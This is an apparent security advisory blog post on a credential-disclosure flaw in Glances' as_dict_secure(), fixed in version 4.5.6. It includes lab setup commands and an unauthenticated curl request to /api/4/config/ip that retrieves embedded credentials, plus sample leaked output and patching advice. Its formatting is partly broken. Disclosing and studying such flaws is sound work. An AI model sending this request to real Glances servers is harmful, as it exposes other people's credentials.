Listen to this Post
The vulnerability exists in Glances’ `as_dict_secure()` function, located in glances/config.py. This function was explicitly designed to provide a sanitised copy of the configuration dictionary for unauthenticated API access. Its docstring states it returns a copy where “Sensitive keys in remaining sections are replaced by ””. However, the implementation only checks option names against a regular expression pattern for terms like “password”, “token”, or “secret”. It never inspects the actual values of configuration options.
The core issue arises in the `
` configuration section, which supports `public_api` (a URL), `public_username` (a login), and `public_password` (a password). While `public_password` is correctly masked because its name matches the regex, both `public_username` and a `public_api` URL containing embedded credentials (e.g., <code>https://user:pass@host/`) are returned in full. This happens because their names do not match the sensitive key pattern. The flaw is triggered when Glances is run in web server mode without the `--password` flag (default, no authentication). An unauthenticated attacker can then retrieve these credentials by sending a GET request to `/api/4/config` or</code>/api/4/config/ip<code>. This represents a failure of `as_dict_secure()` to fulfill its documented purpose of protecting credentials in no-auth mode. The issue is fixed in Glances version 4.5.6. <h2 style="color: blue;">DailyCVE Form:</h2> Platform: Glances Version: < 4.5.6 Vulnerability: Credential Disclosure Severity: Moderate date: 2026-07-28 <h2 style="color: blue;">Prediction: 2026-08-17</h2> <h2 style="color: blue;">What Undercode Say:</h2> [bash] Check Glances version glances --version Run Glances in web server mode (no auth) docker run -d --name glances-test -p 8080:61208 -e GLANCES_OPT='-w' nicolargo/glances:latest Wait for the service to start sleep 20 Modify the configuration to include vulnerable values docker exec glances-test sed -i 's|public_api=https://ipv4.ipleak.net/json/|public_api=https://admin:[email protected]/json/|' /etc/glances/glances.conf docker exec glances-test sed -i 's|public_username=<myname>|public_username=myname|' /etc/glances/glances.conf docker exec glances-test sed -i 's|public_password=<mysecret>|public_password=mysecret|' /etc/glances/glances.conf Restart the container to apply changes docker restart glances-test sleep 15 Exploit: Retrieve the leaked credentials curl -s "http://<target-ip>:8080/api/4/config/ip"
<h2 style=”color: blue;”>Exploit: (Educational Purposes!)</h2>
An unauthenticated attacker can directly access the vulnerable API endpoint. The following `curl` command demonstrates the exploit against a vulnerable instance:
curl -s "http://<target-ip>:8080/api/4/config/ip"
A successful exploit will return a JSON response similar to the following, exposing the `public_api` URL with embedded credentials and thepublic_username:
{"public_api": "https://admin:[email protected]/json/", "public_username": "myname", "public_password": ""}
<h2 style="color: blue;">Protection:</h2>
The primary and recommended protection is to upgrade Glances to version 4.5.6 or later. If an immediate upgrade is not possible, as a temporary workaround, the `/api/4/config` and `/api/4/config/ip` endpoints should be disabled or restricted to authenticated users only.
<h2 style="color: blue;">Impact:</h2>
This vulnerability allows an unauthenticated attacker to retrieve sensitive information, including usernames and plaintext credentials. The exposed credentials could be used to gain unauthorized access to the configured backend services, such as the monitoring API endpoint defined inpublic_api`. This compromises the confidentiality of the system and its connected services.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

